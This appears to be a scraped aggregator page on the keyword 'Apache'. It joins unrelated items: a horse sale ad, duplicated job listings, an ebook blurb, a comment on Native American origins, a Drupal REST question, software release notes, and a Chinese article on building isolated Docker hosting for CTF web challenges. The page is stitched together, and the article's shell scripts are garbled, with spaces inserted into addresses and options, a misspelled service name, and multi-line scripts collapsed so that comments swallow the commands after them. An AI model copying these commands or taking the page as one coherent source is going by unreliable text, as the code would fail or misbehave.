ALLURE RANCH ULTIMATE DESIRE 2007 Mare Sorrel Pinto AMHA/AMHR Registered Sire: RFM Boogerman's Ultimate Warrior Dam: Lucky Four Apache Starlite Priced open at: 2500.00. However, we can breed her to any stallion of your choice for an additional 500.00 if you'd like. Desire is an OUTSTANDING mare and one of my two remaining daughter's of our former stallion RFM Boogerman's Ultimate Warrior tha stallion that now resides in Australia. She has a lovely chiseled head with a nice big eye on her, arabtype curl tipped ears, tremendous top-line, shoulder and hip. She has fabulous knee/hock action. Although, shes an easy keeper she has refinement to her bone mass and she produces ultra refined foals. She's an easy to handle mare and has an alert attitude that she passes on to her offspring. Her sire RFM Boogerman's Ultimate Warrior was a former show stallion her in the states and is now a champion producer in Australia. His own sire was All Small Reflections Boogerman a multi-champion stallion.Her grandsire on her dams side is the well know Richter Apache. Desire has produced three sensational foals for us one of which was shown. Unfortunately, I need to reduce our herd. Therefore, this is the ONLY reason why we are offering her for consideration. This is YOUR opportunity to own a PHENOMENAL mare.... Buyer pays for coggins/health certificate and any state required testing.

          Developer Enterprise Data Integration - Wipro LTD - McLean, VA      Cache   Translate Page      
Mandatory Skills: Ab Initio Desirable Skills: Amazon Web Services - AWS, Apache Spark Job Description: Key skills required for the job are: Ab Initio-L3 ...
From Wipro LTD - Wed, 03 Oct 2018 10:48:05 GMT - View all McLean, VA jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Resource Streams in Apache Sling      Cache   Translate Page      
none
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          使用 Docker 构建安全的虚拟空间      Cache   Translate Page      

*本文作者:Li4n06,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

前言

最近上的某水课的作业是出 ctf web题目,然而大多数同学连 php 都没学过,(滑稽)更别说配置服务器了,于是我想能不能趁机赚一波外快 造福一下同学,(其实就是想折腾了)。所以打算把我自己的 vps 分成虚拟空间给大家用。但是一般的虚拟空间安全性难以得到保证,一个空间出问题,其他的用户可能都跟着遭殃,也就是旁站攻击。更何况我们这个虚拟空间的用处是 ctf web 题目,总不能让人做出一道题目就能顺手拿到所有题目的 flag 吧。于是想到了使用 docker 来构建安全的虚拟空间,其间遇到了不少问题,下面就是折腾的过程了。

image

实现思路

大体的思路是,在我的 vps 上为每个用户创建一个文件目录,然后将目录挂载到 docker 容器的默认网站目录,也就是/var/www/html,,用户可以通过 FTP 将网站源码上传到自己的文件目录,文件也会同步到容器内。这样就实现了各个空间的环境隔离,避免旁站攻击。

而数据库则可以单独构建一个 mysql 容器,为每个用户分配一个 user&database,让用户和空间容器来远程连接。

前期准备

选择镜像:

空间使用的镜像为:mattrayner/lamp:latest-1604(ubuntu 16.04 + apachd2 + mysql,其实只要有mysql-client 就可以了)

数据库所使用的镜像为:mysql:5(mysql 官方镜像)

配置FTP:

和配置常规的 FTP 没什么区别,这里特别强调3点:

一定要开启 ch_root,防止不同用户之间可以互相查看文件;

如果使用被动模式,那么 云主机的安全组 或者iptables 不要忘了放行端口;

将 umask 设置为 022 (保证用户上传的文件默认权限为755。

选择一个位置存放用户文件夹:

我这里新建一个 ~/rooms/ 来存放用户的文件夹。

配置数据库

1. 网络:

要让虚拟空间的容器能够远程连接数据库,首先要使容器之间在一个网段,那么我们就需要设置一个桥接模式的 docker network,我这里使用 172.22.0.0/16 这个网段。

$ docker network create --driver = bridge --subnet = 172 .22.0.0/16 room_net

2.创建 MySQL 容器:

我们的数据库需要满足:

允许用户远程连接;

允许空间容器连接。

第一点要求,我们通过将数据库容器的 3306 端口映射到 VPS 的开放端口即可,我这里映射到 3307。

第二点要求,只要通过我们刚刚设置的 docker network 即可实现。

所以启动创建容器的命令是的命令是:

$ docker run -d --name room-mysql --network room_net --ip 172 .22.0.1 -p 3307 :3306 -e MYSQL_ROOT_PASSWORD = your_password mysql:5

值得注意的一点是,root 用户是不需要远程登录的,出于安全考虑,我们应该 禁止其通过localhost意外的host登录

执行:

$ docker exec -it room-mysql /bin/bash -c "mysql -u root -p -e\"use mysql;update user set host='localhost' where user='root';drop user where user='root' and host='%';flush privileges;\""

创建空间过程

做好前期的准备工作,我们就可以开始构建空间了,出于方便我们将整个过程编写成 shell 脚本,这样以后要新建空间的时候,只需要运行一下就可以了。

我们创建空间需要以下几个步骤:

1. 创建新的 FTP 用户

这个用户应该满足这样的要求:

可以上传文件到虚拟空间用户文件夹 (废话);

不能访问除虚拟空间用户文件夹之外的位置 (在配置 FTP 时通过ch_root 实现);

创建的时候设置一个随机密码;

不能通过 ssh 登陆 (其实这也是用户能通过 ftp 连接 的必须条件。如果不限制的话,ftp登录时会出现 530 错误。

那么对应的 shell 脚本就是:

#/home/ubuntu/rooms/ 即你的vps上用来存放用户文件夹的位置  # $1 参数为要设置的用户名,也是虚拟空间容器&数据库用户&数据库&用户文件夹的名字useradd -g ftp -d /home/ubuntu/rooms/$1 -m $1 pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`  #生成随即密码echo $1:$pass | chpasswd                                    #为用户设置密码#限制用户通过 ssh 登录(如/etc/shells 里没有/usr/sbin/nologin 需要自己加进去usermod -s /usr/sbin/nologin $1             echo "create ftp user:$1 indentified by $pass"              #输出用户名和密码

2. 新建数据库用户&数据库,并为用户赋权

这部分操作比较简单,我们就只需要为用户新建一个 MySQL 账户和一个专属数据库就好了。

shell 脚本:

# 让用户输入 mysql 容器的 root 密码read -sp "请输入 MySQL 容器的 root 账户密码:" mysql_pass# 创建数据库docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"create database $1;\""# 生成密码pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`# 创建 MySQL 用户docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"CREATE USER '$1'@'%' IDENTIFIED BY '$pass';\""# 为用户赋予权限docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"grant all privileges on $1.* to '$1'@'%';flush privileges;\""# 输出账户信息echo "create database user:$1@'%' indentified by $pass"

3. 新建空间

到现在我们已经可以创建空间容器了,想一想这个空间要满足什么基本要求呢?

能够外网访问;

能够连接数据库;

挂载用户文件夹内的文件到网站根目录。

那么命令就是:

$ docker run -d --name $1 --network room_net -p $2 :80 -v /home/ubuntu/rooms/$1 /www:/var/www/html mattrayner/lamp:latest-1604

但是作为一个用做虚拟空间的容器,我们还需要考虑 内存 的问题,如果不加限制,docker默认使用的最大内存就是 VPS 本身的内存,很容易被人恶意耗尽主机资源。

所以我们还要限制一下容器的最大使用内存。

关于 docker 容器内存使用的有趣的现象:

在最初,我把容器的内存限制到了 128m,然后访问网站发现 apache 服务没有正常启动,于是我把内存限制上调到了 256m,然后执行 docker stats 发现容器内存使用率接近100%;

有趣的是,当我尝试限制内存为 128m ,然后手动开启 apache 服务时,发现服务完全可以被正常启动,查看内存占用率,发现只占用了 30m 左右的内存。

为什么会出现这种情况呢?我大概猜想是因为容器内还有一些其他服务,当限制内存小于 256m 的时候,这些服务无法被同时启用,但是我们可以只启用 apache 啊!

于是命令变成了下面这样:

docker run -d --name $1 --cpus 0 .25 -m 64m --network room_net -p $2 :80 -v /home/ubuntu/rooms/$1 /www:/var/www/html mattrayner/lamp:latest-1604 docker exec -it $1 /bin/bash -c "service apach2 start;"

最后一步,修改挂载文件夹的所有者:

到这时,理论上我们的空间已经可以正常使用了,可是我用 FTP 连接上去发现,并没有权限上传文件。

经过漫长的 debug 后发现,在容器启动一段时间后,我们挂载到容器内部的文件夹的所有者发生了改变,于是我查看了容器内部的 run.sh 脚本,发现了这样的内容:

if [ -n "$VAGRANT_OSX_MODE" ];then    usermod -u $DOCKER_USER_ID www-data    groupmod -g $(($DOCKER_USER_GID + 10000)) $(getent group $DOCKER_USER_GID | cut -d: -f1)    groupmod -g ${DOCKER_USER_GID} staff    chmod -R 770 /var/lib/mysql    chmod -R 770 /var/run/mysqld    chown -R www-data:staff /var/lib/mysql    chown -R www-data:staff /var/run/mysqldelse    # Tweaks to give Apache/PHP write permissions to the app    chown -R www-data:staff /var/www    chown -R www-data:staff /app    chown -R www-data:staff /var/lib/mysql    chown -R www-data:staff /var/run/mysqld    chmod -R 770 /var/lib/mysql    chmod -R 770 /var/run/mysqldfi

可以看到,当没有设置 $VAGRANT_OSX_MODE 这个环境变量时,容器会修改 /app(/var/www/html 的软链接)文件夹的所有者为 www-data ,那么我们就需要在启动容器时,设置这个环境变量值为真。

而 /app 文件夹 的默认所有者是 root 用户,我们将本地文件夹挂载到容器内的/app,后,本地文件夹的所有者也会变为 root 。所以我们还需要修改本地文件夹的所有者。

于是创建容器的 shell 脚本又变成了:

# 启动容器docker run -d --name $1 --cpus 0.25 -m 64m --network room_net -p $2:80 -eVAGRANT_OSX_MODE=1 -v /home/ubuntu/rooms/$1/www:/var/www/html mattrayner/lamp:latest-1604# 启动apache2docker exec -it $1 /bin/bash -c "service apache2 start;"# 修改挂载文件夹的所有者chown $1:ftp -R /home/ubuntu/rooms/$1/www

最后的脚本:

到现在创建空间的过程就结束了,那么贴上最后的脚本

创建空间脚本:

#!/bin/bash# The shell to create new room# Last modified by Li4n0 on 2018.9.25# Usage: #   option 1: database/dbuser/room/ftpuser/ name#   option 2: port# create new ftp useruseradd -g ftp -d /home/ubuntu/rooms/$1 -m $1pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`echo $1:$pass | chpasswdusermod -s /usr/sbin/nologin $1echo "create ftp user:$1 indentified by $pass"# create new databaseread -sp "请输入 MySQL 容器的 root 账户密码:" mysql_passdocker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"create database $1;\""pass=`cat /dev/urandom | head -n 10 | md5sum | head -c 10`docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"CREATE USER '$1'@'%' IDENTIFIED BY '$pass';\""docker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"grant all privileges on $1.* to '$1'@'%';flush privileges;\""echo "create database user:$1@'%' indentified by $pass"#create new roomdocker run -d --name $1 --cpus 0.25 -m 64m --network room_net -p $2:80 -eVAGRANT_OSX_MODE=1 -v /home/ubuntu/rooms/$1/www:/var/www/html mattrayner/lamp:latest-1604docker exec -it $1 /bin/bash -c "service apache2 start;"chown $1:ftp -R /home/ubuntu/rooms/$1/www

删除空间脚本:

#!/bin/bashread -sp "请输入 MySQL 容器的 root 账户密码:" mysql_pass#drop the databasedocker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"drop database $1\""#delete dbuserdocker exec -it mysql-docker /bin/bash -c "mysql -u root -p$mysql_pass -e \"use mysql;drop user '$1'@'%';flush privileges;\""#delete the containerdocker stop $1docker rm $1#delete ftp useruserdel $1rm -rf /home/ubuntu/rooms/$1

用法:

# 创建sudo create_room.sh room1 10080  # 用户名 映射到 VPS 的端口# 删除sudo del_room.sh room1

总结

到这里我们就实现通过 docker 搭建较安全的虚拟空间了,当然,如果真的想上线运营,还有很多需要完善的地方,比如 空间大小的限制、用户文件和数据库的定时备份等等,有兴趣的朋友可以去自己完善。

那么到这里我的折腾就结束了,现在去卖空间给同学发福利了!

*本文作者:Li4n06,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

image


          Caden by TL Reeve (ePUB, PDF, Downloads)      Cache   Translate Page      
Caden (Apache County Shifters #2) by TL Reeve,‎ Michele Ryan – Free eBooks Download Description: Caden Raferty messed up—big time. He’s turned his back on his family and friends, but most of all his mate, Danielle Blueriver. Danielle is done with love and done with Caden. After two near death experiences, she’s regressed into herself, not wanting to be seen or heard. Her life is crumbling down around her and the only thing giving her the will to live are her boys, Aiden and Nicolas. But, an old foe isn’t done with either of them, and once again, they are
          Senior QA Engineer - Cast & Crew Entertainment Services - Burbank, CA      Cache   Translate Page      
Robot Framework Test Automation, Apache JMeter - Load and Performance Test, Selenium. Perform manual and automated Functional, Performance and End to End...
From Cast & Crew Entertainment Services - Thu, 20 Sep 2018 06:29:47 GMT - View all Burbank, CA jobs
          Comment on “I’m Just Glad We Ruined Brett Kavanaugh’s Life”: Colbert Writer Tweets Out A Celebration Of The Politics Of Personal Destruction by David B. Benson      Cache   Translate Page      
Just to set down what is known about the peopling of the Americas: There is no evidence of Neanderthals further north or east of Denisova cave in Siberia. It is not known why the Neanderthals became extinct but all of us non-Africans, that is, outside of Sub-Saharan Africa, have about 1--2% of Neanderthal DNA. The Beringians lived in Beringia, both sides of what is now the Bering Straits but the sea stand was about 125 meters lower than now, for about 6000 years, based on linguistic and genetic evidence. To be explicit, the Americas were unpopulated at that time outside of American Beringia. About 16---15 thousand years ago the first peoples came south from Beringia. These are the Amerindians which populated all of the Americas based on linguistic and genetic evidence. The Clovis culture consisted of Amerindians living across the southern parts of what is now the USA. Clovis culture ended abruptly at the start of the Younger Dryas when the Amerindians adapted other cultural forms. Much later the second wave came south. The best known of these Athabaskan tribes are the Navaho and the Apache. The Aluts seem to have remained in what is now Alaska. The peoples of the Arctic eventually spread east as far as Greenland. Given how long these peoples have lived in the Americas, calling them corporately indigenous peoples seems appropriate. They certainly are not Indians from India.
          Accessing the REST API with custom user      Cache   Translate Page      

Hello lads!

I need some help with the REST services and its access/auth mechanism. I enabled the "Language" REST Resource which comes out of the box. Furthermore i want to authenticate my user with basic_auth, so that's enabled as well.

When i call the endpoint at /entity/configurable_language/{configurable_language} and add the admin user to the Authentication Header it works fine. What i really want though, is a specific "api" user, which has access only to the api. the user is created and has, for the moment, all permissions (i did this, because of the following error i get all the time).

So as soon as i access exactly the same endpoint, with the same headers but with my api user, i always get: 

{
"message": "The 'administer languages' permission is required."
}

The role "API" has the mentioned permission and my new user is connected to the API role.

Some more content of the request/response:

GET /entity/configurable_language/de HTTP/1.1
Authorization: Basic YXBpOmFwaQ==
Host: 
Content-Type: application/json

HTTP/1.1 403 Forbidden
Date: Tue, 09 Oct 2018 14:15:29 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.2.7
Cache-Control: must-revalidate, no-cache, private
X-Drupal-Dynamic-Cache: HIT
X-UA-Compatible: IE=edge
Content-language: en
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Drupal-Cache-Tags: 4xx-response config:user.role.anonymous http_response
X-Drupal-Cache-Contexts: user.permissions
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Vary:
X-Generator: Drupal 8 (https://www.drupal.org)
Content-Length: 74
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/json

{"message":"The \u0027administer languages\u0027 permission is required."}

Any ideas? - Thank you very much!

Drupal version: 

          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          .Net Core 2.1.5      Cache   Translate Page      
Microsoft heeft enkele dagen geleden .Net Core 2.1.5 uitgegeven. Dit is een modulair platform voor het maken van webapplicaties en services die draaien op Linux, macOS en Windows. Het maakt natuurlijk gebruik van .Net en je kunt het vergelijken met Node.js of Go. Het geheel wordt onder een mix van MIT-, Apache 2- en CC BY 4.0-licenties uitgegeven. Deze uitgave is voorzien van de volgende aankondiging op het .Net Blog:
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          (USA-CA-San Diego) #95903 System Administrator and Project Coordinator      Cache   Translate Page      
#95903 System Administrator and Project Coordinator Filing Deadline: Tue 10/23/2018 Apply Now UCSD Layoff from Career Appointment: Apply by 10/11/18 for consideration with preference for rehire. All layoff applicants should contact their Employment Advisor. Special Selection Applicants: Apply by 10/23/18. Eligible Special Selection clients should contact their Disability Counselor for assistance. DESCRIPTION The UCSD School of Medicine is involved in development of several bioinformatic resources for network analysis that are widely used by the biological research community. The best known is Cytoscape (http://www.cytoscape.org), a collaborative open-source software project. Cytoscape is a leading workstation-based platform for visualizing and processing complex networks. It is widely used with approximately 17,000 downloads per month. NDEx, the Network Data Exchange (http://ndexbio.org), is another major project, a public web resource for sharing, storing, accessing, and publishing biological knowledge as computable networks. The System Administrator and Project Coordinator (SAPC) will manage, maintain and extend the computing infrastructure, both hardware and software, and they will support the users of that infrastructure. The System Administrator and Project Coordinator (SAPC) will work with the software development team to deploy and administrate cloud hosted websites and services, including usage analysis and reporting. Finally, the SAPC will coordinate the software release process for the web and desktop products of the software development team, including the management of issue tracking and user bug reporting. Lab infrastructure system administration: The SAPC will administrate scientific computing infrastructure that includes the secure compute clusters, a VM cluster, a GPU server, lab workstations and compute servers, and multiple storage servers. Most of the systems are housed at the San Diego Supercomputing Center (SDSC). Administration will include maintenance of the rack-mounted systems at SDSC, diagnosing hardware problems, replacing components and installing new systems. The SAPC will work with stakeholders to design hardware and software solutions as the infrastructure evolves to meet new demands. They will manage the purchasing process and interface with vendors for warranty support. They will monitor alerts and performance metrics and will plan and manage data and image backup. They will manage the user authentication system, gateway computers, the firewall, VPN, samba server, IP allocation and Hostmaint. They will control the configuration of all systems, using tools such as Puppet. The SAPC will also maintain the documentation for the systems, including hardware configuration. Lab user support: The SAPC will install and maintain user workstations and other computers onsite. They will control the software configuration of these systems, including the installation of commonly used packages. They will diagnose problems and install and replace hardware. They will assist lab members in the configuration of personal machines for interfacing to the lab infrastructure. They will maintain and extend user documentation for lab computing. They will assist in the IT issues encountered when installing or maintaining scientific instruments in the wet lab, including interfacing with vendors for support and managing regular backups of attached computers. The SAPC will manage user accounts and commercial software used in the lab. They will monitor the usage of the lab computing infrastructure and assist users in using those systems, answering questions, fielding bug reports and otherwise responding to requests. Cloud website and service system administration: The SAPC will administrate websites and web services hosted on cloud providers including AWS and Google. They will track usage of these systems, using both standard tools and custom logging and reporting systems. They will prepare periodic reports of usage, working with the software development team to plan and implement appropriate metrics. They will perform backups, respond to outages, and work with the software development team to make the deployed systems robust and secure. Coordination of software release process and issue tracking: The SAPC will work with the software development team to maintain and administrate internal issue tracking systems and end-user bug and issue reporting systems. They will manage aspects of the software release process, including maintaining schedules, organizing and tracking testing, and performing final deployment to the web. MINIMUM QUALIFICATIONS + Bachelor's degree in Computer Science or Computer Engineering or equivalent combination of education and experience + Two (2) or more years of system/database administration experience. + General knowledge of several areas of IT. + Demonstrated ability to install software and troubleshoot and repair moderately complex problems with computing devices, peripherals and software. Understanding of system performance monitoring and actions that can be taken to improve or correct performance. Basic knowledge of incident response procedures. Demonstrated ability to follow software specifications Including windows and OS/X operating systems. + Demonstrated experience with database administration. Including SQL databases such as MySQL, Postgres + Demonstrated knowledge of computer security tools, best practices and policies. Demonstrated skills applying security controls to computer software and hardware. Examples: user authentication systems, gateway computers, firewalls, VPNs + Demonstrated testing and test planning skills. + Ability to write technical documentation in a clear and concise manner. + Demonstrated understanding of how system management actions affect users and dependent / related functions. + Interpersonal skills sufficient to work with both technical and non-technical personnel at various levels in the organization. Ability to elicit and communicate technical and non-technical information in a clear and concise manner. + Self-motivated and works independently and as part of a team. Demonstrates problem-solving skills. Able to learn effectively and meet deadlines. + Experience with UNIX systems administration, including installation, backups, upgrades and maintenance. Also including experience administrating clusters + Experience using GitHub or other version control software in multi-user projects, especially for periodically released software. + Experience maintaining medium scale cluster hardware, small numbers of rack-mounted systems. Including diagnosis of hardware problems, replacing components and installation of new hardware. + Experience deploying and maintaining basic websites and/or web services via apache or other webservers or hosted on cloud providers such as AWS and Google. + Experience in supporting end users in both software and / or hardware issues. + Experience using issue tracking systems such as Jira, Redmine, Asana PREFERRED QUALIFICATIONS + Experience in purchasing of hardware and software, interfacing with vendors, managing warranties and vendor support. + Experience with VM clusters (including software such as VMWare) and GPU servers + Experience working with stakeholders to design hardware and software solutions in computing infrastructure + Experience working with large RAID systems or other redundant or high performance cluster storage hardware and software. + Experience working with GPFS, and other cluster storage software. + Experience with remote monitoring software like Ganglia, Nagios, etc. + Experience with Puppet or other administration automation software + Experienced in webserver configuration, Docker deployment, scalable clusters, Solr or Lucene search engine databases. + Experience with logging and usage tracking systems for webservers, websites, including the analysis of usage and the preparation of relevant reports. + Knowledge of bioinformatics software packages and applications + Experience managing or participating in software releases. + Knowledge of business processes and procedures. Knowledge of the design, development and application of technology and systems to meet business needs. + Knowledge relating to the design and development of software. Basic knowledge of secure software development. + Knowledge of data management systems, practices and standards. SPECIAL CONDITIONS + Employment is subject to a criminal background check. Apply Now UC San Diego Health is the only academic health system in the San Diego region, providing leading-edge care in patient care, biomedical research, education, and community service. Our facilities include two university hospitals, a National Cancer Institute-designated Comprehensive Cancer Center, Shiley Eye Institute, Sulpizio Cardiovascular Center, and several outpatient clinics. UC San Diego Medical Center in Hillcrest is a designated Level I Trauma Center and has the only Burn Center in the county. We invite you to join our dynamic team! Applications/Resumes are accepted for current job openings only. For full consideration on any job, applications must be received prior to the initial closing date. If a job has an extended deadline, applications/resumes will be considered during the extension period; however, a job may be filled before the extended date is reached. UC San Diego Health is an Equal Opportunity/Affirmative Action Employer. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, age, protected veteran status, gender identity or sexual orientation. For the complete University of California nondiscrimination and affirmative action policy see: http://www-hr.ucsd.edu/saa/nondiscr.html UC San Diego is a smoke and tobacco free environment. Please visit smokefree.ucsd.edu for more information. Payroll Title: INFO SYS ANL 2 Department: MEDICINE/Genetics Salary Range Commensurate with Experience Worksite: La Jolla Appointment Type: Career Appointment Percent: 100% Union: Uncovered Total Openings: 1 Work Schedule: Days, 8 hrs/day, Mon-Fri As a federally-funded institution, UC San Diego Health maintains a marijuana and drug free campus. New employees are subject to drug screening.
          (USA-CA-San Diego) #95910 Cytoscape Cyberinfrastructure Developer      Cache   Translate Page      
#95910 Cytoscape Cyberinfrastructure Developer Filing Deadline: Tue 10/23/2018 Apply Now UCSD Layoff from Career Appointment: Apply by 10/11/18 for consideration with preference for rehire. All layoff applicants should contact their Employment Advisor. Special Selection Applicants: Apply by 10/23/18. Eligible Special Selection clients should contact their Disability Counselor for assistance. DESCRIPTION How would you like to be on the front lines of computational biology, building tools and infrastructure to help scientists in basic research and in developing therapies for diseases like cancer, dementia and heart disease? The mission of the Cytoscape Cyberinfrastructure (“CI”) project is to create infrastructure and applications to support the effective use of biological networks by the research, pharmaceutical, and clinical communities. The CI project has the potential to impact many aspects of biological research and drug development and is already being incorporated in projects in academia and industry. We provide tools and resources for scientists to develop applications and analyses using biological networks in fields including genomics, proteomics, personalized medicine, and the microbiome. We’re looking for a skilled and versatile software engineer to join our team and help us build and deploy cloud and desktop applications and data resources for systems biology. Our project is entering an exciting new phase where the team is evolving the core technologies of CI, creating a Cytoscape Cloud, a synthesis of multiple projects, applications, and resources. Our best-known technology is the Cytoscape application (http://cytoscape.org), a leading workstation-based platform for visualizing and processing complex networks. NDEx, the Network Data Exchange (http://ndexbio.org), is another central component, providing a public web resource for sharing, storing, accessing, and publishing biological knowledge as computable networks. Thousands of researchers already use Cytoscape and NDEx and in the next years, the Cytoscape Cloud will rapidly expand, adding new functionality via web applications and internet services. Cytoscape and NDEx web clients are deployed on public websites, and are written primarily using JavaScript, HTML5, and packages such as jQuery and angular.js. CI services may be written in any appropriate language and will present and rely on REST-based interfaces. The CI developer will deal with the modeling of complex biological concepts in the course of requirements gathering, example application development, and test development. The CI developer will create, deploy and maintain software that uses networks to model complex biological concepts. The software will include applications, web services, and resources to be used by biologists, bioinformatics researchers and other developers. They will interact with each of these target audiences in requirements gathering, example application development, and test development. They will interface with colleagues from project sponsors and with collaborators in the UCSD community and worldwide. The CI Developer will work flexibly across multiple technologies, both front-end, back-end, and database, and will rapidly acquire skills in new programming languages and environments, packages, and databases. The project uses an aggressive array of technologies to deliver high-performance access to the stored networks and biological analytics, and to implement front-end integration with web-based interfaces and visualization. The CI Developer must perform as a seasoned, experienced bioinformatics programming professional with a broad understanding of computational algorithms and systems; identifies and resolves a wide range of issues/software bugs. They will operate independently and demonstrate good judgment in selecting methods and techniques for obtaining solutions. Other tasks will include: - System administration of public and internal servers. - Software deployment and distribution. - Database management, backup, migration, and recovery. MINIMUM QUALIFICATIONS + Bachelor's degree in computer science or related area and/or equivalent experience/training. + Five or more years of work or research experience in software development. + Thorough knowledge of bioinformatics methods, applications programming, web development and data structures. + Understanding of relational databases, web interfaces, and operating systems. + Communication skills to work with both technical and non-technical personnel in multiple fields of expertise and at various levels in the organization. + Ability to communicate technical information in a clear and concise manner. + Ability to interface with management on a regular basis. + Self motivated, work independently or as part of a team, able to learn quickly, meet deadlines and demonstrate problem solving skills. + Thorough knowledge of web, application and data security concepts and methods. + Proficiency in command-line use of UNIX platforms. + Proficiency in the following programming languages and environments: Java, JavaScript/HTML5; Web application development; SQL and relational databases; UNIX operating system and basic UNIX system administration. PREFERRED QUALIFICATIONS + Advanced unix experience: Variations of UNIX (e.g., SunOS, Open Solaris, Ubuntu, Red Hat Linux); Shell script programming; Access control management, applications configuration management; Virtual image creation and deployment. + Experience working in a product-oriented development environment, managing a public website with many user accounts, participating in formal website, web application and desktop application release processes + Experience with web application technologies and services such as AWS, Kubernetes, Apache, proxies, REST API design and deployment of a REST endpoint, Infrastructure necessary to develop client-server applications and model-view controller applications; Source control management, familiarity with Git and GitHub. + Experience with one or more of Python,Jupyter notebooks, R, Shiny, R markdown, cytoscape.js, D3, deck.gl, Angular, React, Materials, Bootstrap, Docker, Singularity + Thorough knowledge of modern biology and applicable field of research. As employed in interactions with researchers using the developed software. + Thorough knowledge of bioinformatics programming design, modification and implementation. As employed in developing software interfaces, data upload and download, interacting with researchers. + Strong project management skills. + Significant experience in Java user interface development, Java Swing, and Java-based web services + Demonstrated ability to work in a rapidly changing, multi-technology environment in which new skills must be acquired on a regular basis. SPECIAL CONDITIONS + Employment is subject to a criminal background check. + Must be able to work outside normal hours to meet project deadlines, as well as system maintenance and emergencies. + Must be willing to answer work related questions while not physically at the work location. + Must be willing to work in an animal-related research environment. + Must be willing to work in situations where all intellectual property created will be released under a permissive open-source license. + Must be willing and able to travel. Apply Now UC San Diego Health is the only academic health system in the San Diego region, providing leading-edge care in patient care, biomedical research, education, and community service. Our facilities include two university hospitals, a National Cancer Institute-designated Comprehensive Cancer Center, Shiley Eye Institute, Sulpizio Cardiovascular Center, and several outpatient clinics. UC San Diego Medical Center in Hillcrest is a designated Level I Trauma Center and has the only Burn Center in the county. We invite you to join our dynamic team! Applications/Resumes are accepted for current job openings only. For full consideration on any job, applications must be received prior to the initial closing date. If a job has an extended deadline, applications/resumes will be considered during the extension period; however, a job may be filled before the extended date is reached. UC San Diego Health is an Equal Opportunity/Affirmative Action Employer. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, age, protected veteran status, gender identity or sexual orientation. For the complete University of California nondiscrimination and affirmative action policy see: http://www-hr.ucsd.edu/saa/nondiscr.html UC San Diego is a smoke and tobacco free environment. Please visit smokefree.ucsd.edu for more information. Payroll Title: BIOINFORMATICS PROGR 3 Department: MEDICINE/Genetics Salary Range Commensurate with Experience Worksite: La Jolla Appointment Type: Career Appointment Percent: 100% Union: Uncovered Total Openings: 1 Work Schedule: Days, 8 hrs/day As a federally-funded institution, UC San Diego Health maintains a marijuana and drug free campus. New employees are subject to drug screening.
          Доступен web-браузер Min 1.8      Cache   Translate Page      
Опубликован релиз web-браузера Min 1.8, предлагающего минималистичный интерфейс, построенный вокруг манипуляций с адресной строкой. Браузер создан с использованием платформы Electron, позволяющей создавать обособленные приложения на основе движка Chromium и платформы Node.js. Интерфейс Min написан на JavaScript, CSS и HTML. Код распространяется под лицензией Apache 2.0. Сборки сформированы для Linux, macOS и Windows.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
